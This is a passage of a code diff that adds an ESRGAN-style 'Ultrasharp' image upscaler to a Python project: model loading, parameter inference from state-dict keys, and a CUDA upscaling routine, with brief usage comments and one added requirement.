+            bias=bias,
+            groups=groups,
+        )
+    elif convtype == "DeformConv2D":
+        from torchvision.ops import DeformConv2d  # not tested
+
+        c = DeformConv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    elif convtype == "Conv3D":
+        c = nn.Conv3d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    else:
+        c = nn.Conv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+
+    if spectral_norm:
+        c = nn.utils.spectral_norm(c)
+
+    a = act(act_type) if act_type else None
+    if "CNA" in mode:
+        n = norm(norm_type, out_nc) if norm_type else None
+        return sequential(p, c, n, a)
+    elif mode == "NAC":
+        if norm_type is None and act_type is not None:
+            a = act(act_type, inplace=False)
+        n = norm(norm_type, in_nc) if norm_type else None
+        return sequential(n, a, p, c)
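
To make the assembly order concrete, a small sketch (not in the commit) of what the default "CNA" mode produces — with zero padding the pad layer is folded into the conv itself, leaving conv -> norm -> activation:

# Illustrative only.
block = conv_block(3, 64, kernel_size=3, norm_type="batch", act_type="leakyrelu")
print(block)  # Sequential(Conv2d(3, 64, ...), BatchNorm2d(64, ...), LeakyReLU(0.2, ...))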
models/ultrasharp/model.py ADDED
@@ -0,0 +1,27 @@
+from typing import List
+
+import torch
+
+import models.ultrasharp.arch as arch
+from models.ultrasharp.util import infer_params, upscale_without_tiling
+
+
+class Ultrasharp:
+    def __init__(self, filename):
+        self.filename = filename
+
+    def enhance(self, img, outscale=4):
+        state_dict = torch.load(self.filename, map_location="cpu")
+
+        in_nc, out_nc, nf, nb, plus, mscale = infer_params(state_dict)
+
+        model = arch.RRDBNet(
+            in_nc=in_nc, out_nc=out_nc, nf=nf, nb=nb, upscale=mscale, plus=plus
+        )
+        model.load_state_dict(state_dict)
+        model.eval()
+
+        model.to("cuda")
+
+        img = upscale_without_tiling(model, img)
+        return img, None
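
A rough usage sketch for the wrapper above (illustrative; the weights filename is a hypothetical local path, and a CUDA device is required since the model is moved to "cuda" unconditionally):

# Hypothetical usage only.
from PIL import Image
upscaler = Ultrasharp("4x-UltraSharp.pth")
result, _ = upscaler.enhance(Image.open("input.png"))  # HxWx3 uint8 RGB array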
models/ultrasharp/util.py ADDED
@@ -0,0 +1,47 @@
+import numpy as np
+import torch
+
+
+def infer_params(state_dict):
+    # this code is copied from https://github.com/victorca25/iNNfer
+    scale2x = 0
+    scalemin = 6
+    n_uplayer = 0
+    plus = False
+
+    for block in list(state_dict):
+        parts = block.split(".")
+        n_parts = len(parts)
+        if n_parts == 5 and parts[2] == "sub":
+            nb = int(parts[3])
+        elif n_parts == 3:
+            part_num = int(parts[1])
+            if part_num > scalemin and parts[0] == "model" and parts[2] == "weight":
+                scale2x += 1
+            if part_num > n_uplayer:
+                n_uplayer = part_num
+                out_nc = state_dict[block].shape[0]
+        if not plus and "conv1x1" in block:
+            plus = True
+
+    nf = state_dict["model.0.weight"].shape[0]
+    in_nc = state_dict["model.0.weight"].shape[1]
+    out_nc = out_nc
+    scale = 2**scale2x
+
+    return in_nc, out_nc, nf, nb, plus, scale
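
As a worked example of the key parsing above (assuming the typical old-arch ESRGAN x4 key layout; not taken from this commit):

# "model.1.sub.23.weight" -> 5 parts with parts[2] == "sub", so nb = 23
# "model.8.weight" and "model.10.weight" -> part_num > scalemin (6), so scale2x = 2
# hence scale = 2 ** 2 = 4, and out_nc comes from the highest-numbered conv weight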
+
+
+def upscale_without_tiling(model, img):
+    img = np.array(img)
+    img = img[:, :, ::-1]
+    img = np.ascontiguousarray(np.transpose(img, (2, 0, 1))) / 255
+    img = torch.from_numpy(img).float()
+    img = img.unsqueeze(0).to("cuda")
+    with torch.no_grad():
+        output = model(img)
+    output = output.squeeze().float().cpu().clamp_(0, 1).numpy()
+    output = 255.0 * np.moveaxis(output, 0, 2)
+    output = output.astype(np.uint8)
+    output = output[:, :, ::-1]
+    return output
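
A round-trip sketch (illustrative, not in the commit; `model` is assumed to be a loaded RRDBNet on CUDA): the two [:, :, ::-1] flips mean the network sees BGR internally while the caller passes and receives RGB:

# Hypothetical usage only.
from PIL import Image
out = upscale_without_tiling(model, Image.open("input.png"))
Image.fromarray(out).save("output.png")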
requirements.txt CHANGED
@@ -35,6 +35,7 @@ webdataset==0.2.48
 https://comic-assets.s3.ap-south-1.amazonaws.com/packages/mmcv_full-1.7.0-cp39-cp39-linux_x86_64.whl
 python-dateutil==2.8.2
 PyYAML
+invisible-watermark
 torchvision==0.15.2
 imgaug==0.4.0
 tqdm==4.64.1